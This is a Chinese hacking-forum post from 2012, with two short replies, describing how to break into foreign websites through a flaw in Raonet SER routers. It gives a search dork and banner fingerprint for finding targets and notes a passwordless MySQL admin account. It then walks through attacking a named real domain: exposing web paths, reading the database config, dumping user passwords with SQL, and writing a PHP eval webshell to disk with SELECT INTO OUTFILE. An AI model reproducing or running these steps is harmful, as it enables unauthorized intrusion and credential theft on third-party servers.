找回密码
 立即注册
查看: 3645|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:. |1 h7 Z9 D! ?7 T9 a5 y
/ O1 ]) S  I) f, O
1:google搜索'Raonet Subscriber Ethernet Router'1 C/ P6 F) ^" [9 t) ^

( q+ ^- c& K9 d( E* ?: `1 h$ m2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
* _) r2 u/ t2 v6 e7 ]; b$ S" S6 I% ]: m8 ~7 e
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。5 u* f. H$ `: k7 ]& ?
4 F3 z. z: y& I4 ?) [
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......2 z8 z* ~5 z+ b; J5 M

, p. O% o$ n7 T9 L* }9 m% A6 J ! e% x- I, m. `

, ]9 N' h- r7 J入侵步骤:8 J# R+ ]2 }/ F* z" S( [' B
# @: z$ p9 Y) j0 x# w" j8 _
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
% ~2 f0 j5 M7 i4 q& Y
; O; {( q, B) s2 X6 A8 y+ r2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc5 y/ d4 i( l* F& `
3:得到密码后连接,查看GUI管理密码:
9 A. a; B: R8 g3 B$ Ouse ser_500
- Y6 v6 {3 n- |8 `select id,passwd from user;
3 S* |; U; e! U# M. Q# L/ X4:通过数据库写入webshell,执行命令:
% _! y( o* `2 Iuse mysql;
5 g$ `  D' r6 h% p, [1 A+ B: X+ C" I$ Kcreate table ok(cmd TEXT);. n; G6 F# D" @# @
insert into ok values("<?php @eval($_POST[cmd])?>");
2 x% o  D% a4 k% q  |6 ^, o" ~select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
; k) e) q4 N% ?: O% F+ v+ Ldrop table ok;: v. K3 k0 M0 v5 H$ Z* n
* a& ~5 I+ w# w
5:连接后门shell.php 3 g" l! R: t& O3 r/ B

4 @) F8 V9 A: S  `4 f5 n6. 搞定!
' J; p- Q' e. B+ Z
9 [. T3 F/ c- }$ b4 Z
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表